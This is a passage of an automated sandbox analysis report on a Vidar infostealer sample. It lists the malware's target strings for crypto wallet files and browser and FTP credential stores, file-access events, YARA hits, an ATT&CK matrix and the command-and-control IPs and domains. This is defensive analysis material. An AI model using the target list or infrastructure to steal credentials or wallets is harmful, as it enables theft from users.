                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                        Tries to harvest and steal ftp login credentials
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                        Tries to steal Crypto Currency Wallets
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                        Source: Gift.pifBinary or memory string: WIN_81
                        Source: Gift.pifBinary or memory string: WIN_XP
                        Source: Gift.pifBinary or memory string: WIN_XPe
                        Source: Gift.pifBinary or memory string: WIN_VISTA
                        Source: Gift.pifBinary or memory string: WIN_7
                        Source: Gift.pifBinary or memory string: WIN_8
                        Source: Gift.pif.2.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                        Source: Yara matchFile source: 0000000B.00000002.3217998328.000000000484E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Gift.pif PID: 748, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected Vidar
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Yara detected Vidar stealer
                        Source: Yara matchFile source: 11.3.Gift.pif.4688da0.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Gift.pif.1722008.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.Gift.pif.16a2810.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Gift.pif.465b598.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.Gift.pif.465b598.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Gift.pif.465b598.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Gift.pif.46e0000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Gift.pif.4688da0.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.Gift.pif.465b598.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.Gift.pif.4688da0.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Gift.pif.4688da0.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.Gift.pif.465b598.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Gift.pif.1722008.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.Gift.pif.465b598.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000B.00000003.2544771101.000000000465B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3217998328.00000000046E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2544847220.0000000001676000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3217806128.0000000004688000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3217998328.000000000484E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2545299732.000000000465B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2544400162.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3217806128.00000000045E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2544656418.00000000016AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2544847220.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2545299732.0000000004688000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2544427666.000000000465C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2544576964.00000000046E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Gift.pif PID: 748, type: MEMORYSTR
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_0034696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,11_2_0034696E
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_00346E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_00346E32

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire Infrastructure2
                        Valid Accounts                        		11
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        Exploitation for Privilege Escalation                        		11
                        Disable or Modify Tools                        		2
                        OS Credential Dumping                        		2
                        System Time Discovery                        		Remote Services1
                        Archive Collected Data                        		2
                        Ingress Tool Transfer                        		Exfiltration Over Other Network Medium1
                        System Shutdown/Reboot
                        CredentialsDomainsDefault Accounts2
                        Native API                        		2
                        Valid Accounts                        		1
                        DLL Side-Loading                        		1
                        Deobfuscate/Decode Files or Information                        		21
                        Input Capture                        		1
                        Account Discovery                        		Remote Desktop Protocol4
                        Data from Local System                        		11
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                        Valid Accounts                        		2
                        Obfuscated Files or Information                        		Security Account Manager3
                        File and Directory Discovery                        		SMB/Windows Admin Shares21
                        Input Capture                        		3
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                        Access Token Manipulation                        		1
                        Software Packing                        		NTDS27
                        System Information Discovery                        		Distributed Component Object Model3
                        Clipboard Data                        		114
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                        Process Injection                        		1
                        DLL Side-Loading                        		LSA Secrets51
                        Security Software Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
                        Masquerading                        		Cached Domain Credentials1
                        Virtualization/Sandbox Evasion                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                        Valid Accounts                        		DCSync4
                        Process Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Virtualization/Sandbox Evasion                        		Proc Filesystem1
                        Application Window Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                        Access Token Manipulation                        		/etc/passwd and /etc/shadow1
                        System Owner/User Discovery                        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                        Process Injection                        		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1488222 Sample: lem.exe Startdate: 05/08/2024 Architecture: WINDOWS Score: 100 50 steamcommunity.com 2->50 52 arpdabl.zapto.org 2->52 54 KLUpntqKswLWgWJpHbymfJYffqy.KLUpntqKswLWgWJpHbymfJYffqy 2->54 56 Found malware configuration 2->56 58 Antivirus detection for URL or domain 2->58 60 Multi AV Scanner detection for submitted file 2->60 62 6 other signatures 2->62 10 lem.exe 63 2->10         started        signatures3 process4 signatures5 72 Found stalling execution ending in API Sleep call 10->72 13 cmd.exe 2 10->13         started        process6 file7 42 C:\Users\user\AppData\Local\Temp\...behaviorgraphift.pif, PE32 13->42 dropped 74 Drops PE files with a suspicious file extension 13->74 17 Gift.pif 57 13->17         started        22 cmd.exe 2 13->22         started        24 conhost.exe 13->24         started        26 7 other processes 13->26 signatures8 process9 dnsIp10 44 188.245.87.202, 443, 49713, 49715 PARSONLINETehran-IRANIR Iran (ISLAMIC Republic Of) 17->44 46 arpdabl.zapto.org 38.180.132.96, 49752, 80 COGENT-174US United States 17->46 48 steamcommunity.com 104.102.49.249, 443, 49712 AKAMAI-ASUS United States 17->48 34 C:\ProgramData\vcruntime140.dll, PE32 17->34 dropped 36 C:\ProgramData\softokn3.dll, PE32 17->36 dropped 38 C:\ProgramData\nss3.dll, PE32 17->38 dropped 40 4 other files (none is malicious) 17->40 dropped 64 Found many strings related to Crypto-Wallets (likely being stolen) 17->64 66 Tries to harvest and steal ftp login credentials 17->66 68 Tries to harvest and steal browser information (history, passwords, etc) 17->68 70 Tries to steal Crypto Currency Wallets 17->70 28 cmd.exe 1 17->28         started        file11 signatures12 process13 process14 30 conhost.exe 28->30         started        32 timeout.exe 1 28->32         started       

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        lem.exe55%ReversingLabsWin32.Trojan.Generic

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\ProgramData\CBKJJJDHDGDA\GDAAKK0%ReversingLabs
                        C:\ProgramData\freebl3.dll0%ReversingLabs
                        C:\ProgramData\mozglue.dll0%ReversingLabs
                        C:\ProgramData\msvcp140.dll0%ReversingLabs
                        C:\ProgramData\nss3.dll0%ReversingLabs
                        C:\ProgramData\softokn3.dll0%ReversingLabs
                        C:\ProgramData\vcruntime140.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\366791\Gift.pif7%ReversingLabs

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.0%URL Reputationsafe
                        http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
                        https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                        http://www.mozilla.com/en-US/blocklist/0%URL Reputationsafe
                        https://mozilla.org0/0%URL Reputationsafe
                        http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
                        https://www.ecosia.org/newtab/0%URL Reputationsafe
                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL0%URL Reputationsafe
                        https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref0%URL Reputationsafe
                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde74770%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
                        https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                        https://store.steampowered.com/about/0%URL Reputationsafe
                        https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                        https://steamcommunity.com/?subsection=broadcasts0%Avira URL Cloudsafe
                        https://store.steampowered.com/subscriber_agreement/0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=zGRpBs82SFHJ&a0%Avira URL Cloudsafe
                        https://188.245.87.202/msvcp140.dll0%Avira URL Cloudsafe
                        http://arpdabl.FCBFIEGCAE0%Avira URL Cloudsafe
                        http://arpdabl.zapto.org/TH0%Avira URL Cloudsafe
                        https://store.steampowered.c0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=Dbzy0%Avira URL Cloudsafe
                        https://help.steampowered.com/en/0%URL Reputationsafe
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                        http://www.sqlite.org/copyright.html.0%URL Reputationsafe
                        https://store.steampowered.com/0%URL Reputationsafe
                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta0%URL Reputationsafe
                        https://188.245.87.202/vcruntime140.dll1J0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%Avira URL Cloudsafe
                        http://arpdabl.zapto.GCAE0%Avira URL Cloudsafe
                        https://www.autoitscript.com/autoit3/0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%Avira URL Cloudsafe
                        https://188.245.87.202/0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&amp;l=english0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&amp;l=english0%Avira URL Cloudsafe
                        https://steamcommunity.com/profiles/76561199747278259/badges100%Avira URL Cloudmalware
                        https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&amp;l=en0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%Avira URL Cloudsafe
                        http://arpdabl.zaptoEGCAE0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%Avira URL Cloudsafe
                        https://188.245.87.202/softokn3.dll0%Avira URL Cloudsafe
                        https://188.245.87.202KJD0%Avira URL Cloudsafe
                        http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
                        http://store.steampowered.com/privacy_agreement/0%Avira URL Cloudsafe
                        https://store.steampowered.com/points/shop/0%Avira URL Cloudsafe
                        https://t.me/armad2a100%Avira URL Cloudmalware
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                        https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.00%Avira URL Cloudsafe
                        https://188.245.87.202/vcruntime140.dll0%Avira URL Cloudsafe
                        https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%Avira URL Cloudsafe
                        https://store.steampowered.com/privacy_agreement/0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%Avira URL Cloudsafe
                        https://188.245.87.202/mozglue.dll0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%Avira URL Cloudsafe
                        https://steamcommunity.com/profiles/76561199747278259100%Avira URL Cloudmalware
                        https://188.245.87.202/nss3.dll0%Avira URL Cloudsafe
                        http://arpdabl.zapto.org0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%Avira URL Cloudsafe
                        https://188.245.87.202/freebl3.dll0%Avira URL Cloudsafe
                        https://188.245.87.202/sqls.dll0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%Avira URL Cloudsafe
                        https://t.me/armad2ahellosqls.dllsqlite3.dllIn0%Avira URL Cloudsafe
                        https://steamcommunity.com/my/wishlist/0%Avira URL Cloudsafe
                        https://188.245.87.202/V;0%Avira URL Cloudsafe
                        https://steamcommunity.com/market/0%Avira URL Cloudsafe
                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
                        https://store.steampowered.com/news/0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=Q4LAS9-JZwft&amp;l=e0%Avira URL Cloudsafe
                        http://store.steampowered.com/subscriber_agreement/0%Avira URL Cloudsafe
                        https://188.245.87.202/nss3.dllG0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%Avira URL Cloudsafe
                        https://steamcommunity.com/profiles/76561199747278259/inventory/100%Avira URL Cloudmalware
                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0%Avira URL Cloudsafe
                        http://arpdabl.zapto0%Avira URL Cloudsafe
                        https://188.245.87.202/_;0%Avira URL Cloudsafe
                        https://store.steampowered.com/stats/0%Avira URL Cloudsafe
                        https://188.245.87.2020%Avira URL Cloudsafe
                        http://arpdabl.zapto.org/0%Avira URL Cloudsafe
                        https://steamcommunity.com/discussions/0%Avira URL Cloudsafe
                        http://store.steampowered.com/privacy_agreemen0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%Avira URL Cloudsafe
                        https://steamcommunity.com/workshop/0%Avira URL Cloudsafe
                        https://store.steampowered.com/steam_refunds/0%Avira URL Cloudsafe
                        https://store.steampowered.com/legal/0%Avira URL Cloudsafe
                        https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                        http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadCont0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl0%Avira URL Cloudsafe
                        http://arpdabl.zapto.orgE0%Avira URL Cloudsafe
